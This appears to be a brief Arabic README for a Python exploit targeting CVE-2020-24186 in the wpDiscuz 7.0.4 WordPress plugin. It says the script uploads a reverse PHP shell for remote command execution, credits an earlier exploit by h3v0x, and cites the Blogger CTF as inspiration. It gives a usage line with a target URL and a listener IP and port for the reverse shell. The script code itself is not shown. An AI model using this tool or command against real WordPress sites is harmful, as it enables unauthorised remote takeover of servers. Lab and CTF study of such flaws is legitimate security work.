
استغلال لثغرة CVE-2020-24186 في إضافة wpDiscuz 7.0.4 الخاصة بووردبريس، والذي يرفع قشرة PHP عكسية لتنفيذ الأوامر عن بُعد.
استغلال لـ WpDiscuz 7.0.4 يستند إلى الاستغلال الذي كتبه h3v0x.
يستغل الثغرة ويرفع شيل PHP عكسي. كان الإلهام من تحدي Blogger CTF.
exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost -l '192.168.1.9' -s 9001
مثال للاستخدام:
